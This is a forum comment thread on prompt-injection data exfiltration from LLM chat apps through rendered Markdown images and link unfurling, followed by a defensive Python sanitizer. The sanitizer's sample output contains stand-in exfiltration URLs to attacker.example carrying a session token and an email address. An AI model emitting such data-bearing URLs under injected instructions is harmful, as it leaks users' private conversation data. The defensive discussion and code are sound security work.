by jjnoakes 661 days ago
It gets even worse when platforms blindly render img tags or the equivalent. Then no user interaction is required to exfil - just showing the image in the UI is enough.

Yup - all the basic HTML injection and XSS attacks apply. All the OWASP webdev 101 security issues that have been mostly solved by web frameworks are back in force with AI.
These attacks aren't quite the same as HTML injection and XSS.

LLM-based chatbots rarely have XSS holes. They allow a very strict subset of HTML to be displayed.

The problem is that just supporting images and links is enough to open up a private data exfiltration vector, due to the nature of prompt injection attacks.

Yup, basically showing that if you ask AI nicely to <insert secret here>, it's dumb enough to do so. And that can then be chained with things that on their own aren't particularly problematic.
More like XXE I'd say.
Can’t upvote you enough on this point. It’s like everyone lost their collective mind and forgot the lessons of the past twenty years.
> It’s like everyone lost their collective mind and forgot the lessons of the past twenty years.

I think this has it backwards, and actually applies to every safety and security procedure in any field.

Only the experts ever cared about or learned the lessons. The CEOs never learned anything about security; it's someone else's problem. So there was nothing for AI peddlers to forget, they just found a gap in the armor of the "burdensome regulations" and are currently cramming as much as possible through it before it's closed up.

Some (all) CEOs learned that offering a free month coupon/voucher for Future Security Services to secure your information against a breach like the one that just happened on the platform that's offering you a free voucher to secure your data that sits on the platform that was compromised and leaked your data, is a nifty-clean way to handle such legal inconveniences.

Oh, and some supposed financial penalty is claimed, but never really followed up on to see where that money went, or what it accomplished/paid for - and nobody talks about the amount of money that's made by the Legal-man & Machine-owitz LLP Esq. that handles these situations, in a completely opaque manner (such as how much are the legal teams on both sides of the matter making on the 'scandal')?

Techies aren't immune either, before we all follow the "blame management" bandwagon for the 2^101-tieth time.

CEOs aren't the reason supply chain attacks are absolutely rife with problems right now. That's entirely on the technical experts who created all of those pinnacle achievements in tech ranging from tech-led orgs and open source community built package ecosystems. Arbitrary code execution in homebrew, scoop, chocolatey, npm, expo, cocoapods, pip... you name it, it's got infected.

The LastPass data breach happened because _the_ alpha-geek in that building got sloppy and kept the keys to prod on their laptop _and_ got phished.

Wait, where can we read more about that? When you say "the keys to prod" do you mean the prod .ENV variables, or something else?
Yeah, supply chain stuff is scary and still very open. This ranges from the easy stuff like typo-squatting pip packages or hacktivists changing their npm packages to wreck all computers in Russia up to the advanced backdoors like the xz hack.

Another big still mostly open category is speculative execution data leaks or other "abstraction breaks" like Rowhammer.

At least in theory things like Passkeys and ubiquitous password manager use should eventually start to cut down on simple phishing attacks.

This presents an incredible opportunity. The problems are known. The solutions somewhat. Now make a business selling the solution.
How do you 'undo' an entire market founded on fixing mistakes that shouldn't have been made once it gets established? Like the US tax system doesn't get some simple problems fixed because there are entire industries reliant upon them not getting fixed. I'm not sure encouraging outsiders to make a business model around patching over things that shouldn't be happening in the first place is the optimal way to solve the issues in the long term.
This is the fantasy of brownfield redevelopment. The reality is that remediation is always expensive even when it doesn’t depend on novel innovations.
Yes, images! And also link unfurling in bots. This researcher here talked about it before and also found tons of such data exfil issues in various LLM apps: https://embracethered.com/blog/posts/2024/the-dangers-of-unf...
Yeah, I've been collecting examples of that particular vector - the Markdown image vector - here: https://simonwillison.net/tags/markdown-exfiltration/

We've seen that one (now fixed) in ChatGPT, Google Bard, Writer.com, Amazon Q, Google NotebookLM and Google AI Studio.
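The Markdown image vector discussed throughout this thread comes down to one rendering decision: if the chat UI turns `![alt](url)` into an `<img>` tag, the browser fetches that URL the moment the reply is shown, and a prompt-injected reply can put conversation data into the URL's query string. The following is an added example (not code from any of the commenters, nor from any of the products named above) of the defender-side mitigation: a Markdown pass over the model's output that only renders images from an allowlisted origin, refuses any image or link URL carrying a query string or fragment, and records what it removed so the event can be logged. The allowlisted host `images.example.com`, the `attacker.example` domain and the sample model output are all constructed for the example.

```python
"""Defensive Markdown sanitizer for LLM chat output (illustrative example).

Threat: a prompt injection makes the model emit
    ![x](https://attacker.example/i.png?d=<data from the conversation>)
and a UI that renders Markdown images fetches it with no user interaction.
Policy implemented here (an assumed policy for a hypothetical deployment):
  * images render only from an allowlisted origin, never with a query string;
  * links to any other origin are neutralised into plain text;
  * every removal is returned as a finding so it can be logged or alerted on.
"""
import re
from urllib.parse import urlsplit

# Assumed allowlist for the hypothetical deployment (not a real product setting).
ALLOWED_HOSTS = frozenset({"images.example.com"})

# ![alt](url "optional title")  and  [label](url "optional title")
_IMAGE_RE = re.compile(r'!\[([^\]]*)\]\(([^)\s]+)(?:\s+"[^"]*")?\)')
# Negative lookbehind keeps this from re-matching the tail of an image.
_LINK_RE = re.compile(r'(?<!!)\[([^\]]*)\]\(([^)\s]+)(?:\s+"[^"]*")?\)')


def classify_url(url, allowed_hosts=ALLOWED_HOSTS):
    """Return None if the URL may be rendered, otherwise a short reason string."""
    parts = urlsplit(url)
    if parts.scheme not in ("http", "https"):
        return "non-http scheme"
    if parts.hostname not in allowed_hosts:
        return "host not allowlisted"
    # Even an allowlisted host gets no query/fragment: that is where an
    # injected reply would stash the data it wants to exfiltrate.
    if parts.query or parts.fragment:
        return "query/fragment could carry data"
    return None


def sanitize_markdown(text, allowed_hosts=ALLOWED_HOSTS):
    """Return (clean_markdown, findings).

    findings is a list of dicts {"kind", "url", "reason"} describing every
    image or link that was stripped, in the order they were encountered
    (all images first, then links).
    """
    findings = []

    def image_sub(m):
        alt, url = m.group(1), m.group(2)
        reason = classify_url(url, allowed_hosts)
        if reason is None:
            return m.group(0)
        findings.append({"kind": "image", "url": url, "reason": reason})
        return f"[image removed: {alt or 'untitled'}]"

    def link_sub(m):
        label, url = m.group(1), m.group(2)
        reason = classify_url(url, allowed_hosts)
        if reason is None:
            return m.group(0)
        findings.append({"kind": "link", "url": url, "reason": reason})
        return f"{label} (link removed)"

    clean = _IMAGE_RE.sub(image_sub, text)
    clean = _LINK_RE.sub(link_sub, clean)
    return clean, findings


# Constructed sample of a model reply that a prompt injection has tampered
# with: one legitimate chart image, one exfiltration image, one exfil link.
SAMPLE_OUTPUT = (
    "Here is your summary.\n"
    "![ok](https://images.example.com/chart.png)\n"
    "![x](https://attacker.example/i.png?d=SESSION-TOKEN-1234)\n"
    "[details](https://attacker.example/c?q=user-email%40corp.example)\n"
)

if __name__ == "__main__":
    clean, findings = sanitize_markdown(SAMPLE_OUTPUT)
    print(clean)
    for f in findings:
        print(f"removed {f['kind']}: {f['url']} ({f['reason']})")
```

Run as a script, it prints the sanitized reply (the chart image is kept, the other two constructs become plain text) followed by the two findings. The order of the two passes matters: images are handled first, and the link regex carries a negative lookbehind for `!`, so a surviving allowlisted image is not re-matched and mangled as a link. Rendering only from a first-party origin also removes the "no user interaction" property the first comment describes, because the browser never contacts a URL the model chose.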